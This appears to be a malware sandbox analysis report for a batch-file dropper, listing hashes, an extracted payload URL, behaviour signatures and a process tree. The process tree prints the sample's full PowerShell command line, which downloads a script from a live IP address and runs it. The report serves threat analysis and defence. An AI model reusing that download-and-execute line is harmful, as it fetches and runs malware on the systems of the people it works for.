085cf732d404c2443d63dd7fef9f872f0c4dc0ef5f0c048bd308a20aff169bd8

Resubmissions

04-08-2020 12:19

200804-mtj74qqgb2 10

02-08-2020 19:10

200802-qs8g5ktr62 10

Analysis

max time kernel
62s
max time network
63s
platform
windows7_x64
resource
win7
submitted
02-08-2020 19:10

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

21b6d26f5616dbe4b9f07bd5660bb62d.bat
Size

215B
MD5

d0dba6d8db0dbf8637507b05349fd02f
SHA1

e3795cff8728780bd8d72ae5f7e317ee93075e93
SHA256

085cf732d404c2443d63dd7fef9f872f0c4dc0ef5f0c048bd308a20aff169bd8
SHA512

de33e169bfaf0170acb3053f62d40e115e162671c77555e7c0bae5e12579f7900f1172296279167f120a3821566ee8b111e5e2e366711bf0d5fde9e5e3340b7f

Score

10^/10

Malware Config

Extracted

Language

ps1

Source

URLs

ps1.dropper

http://185.103.242.78/pastes/21b6d26f5616dbe4b9f07bd5660bb62d

Signatures

Suspicious use of AdjustPrivilegeToken 1 IoCs

Processes:

powershell.exe

description pid process

Token: SeDebugPrivilege 852 powershell.exe
Suspicious behavior: EnumeratesProcesses 2 IoCs

Processes:

powershell.exe

pid process

852 powershell.exe
852 powershell.exe
Blacklisted process makes network request 1 IoCs

Processes:

powershell.exe

flow pid process

3 852 powershell.exe

description	pid	process
Token: SeDebugPrivilege	852	powershell.exe

pid	process
852	powershell.exe
852	powershell.exe

flow	pid	process
3	852	powershell.exe

Suspicious use of WriteProcessMemory 4 IoCs

Processes:

cmd.exe

description	pid	process	target process
PID 1088 wrote to memory of 852	1088	cmd.exe	powershell.exe
PID 1088 wrote to memory of 852	1088	cmd.exe	powershell.exe
PID 1088 wrote to memory of 852	1088	cmd.exe	powershell.exe
PID 1088 wrote to memory of 852	1088	cmd.exe	powershell.exe

Suspicious behavior: CmdExeWriteProcessMemorySpam 1 IoCs

Processes:

powershell.exe

pid process

852 powershell.exe

pid	process
852	powershell.exe

C:\Windows\system32\cmd.exe
cmd /c "C:\Users\Admin\AppData\Local\Temp\21b6d26f5616dbe4b9f07bd5660bb62d.bat"
1⤵
- Suspicious use of WriteProcessMemory
PID:1088

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "IEX (New-Object System.Net.WebClient).DownloadString('http://185.103.242.78/pastes/21b6d26f5616dbe4b9f07bd5660bb62d');Invoke-NWPLCMRG;Start-Sleep -s 10000"
2⤵
- Suspicious use of AdjustPrivilegeToken
- Suspicious behavior: EnumeratesProcesses
- Blacklisted process makes network request
- Suspicious behavior: CmdExeWriteProcessMemorySpam
PID:852

Resubmissions

Analysis

Sharing

General

Malware Config

Extracted

Signatures

Processes

Network

MITRE ATT&CK Matrix

Replay Monitor

Loading Replay Monitor...

Downloads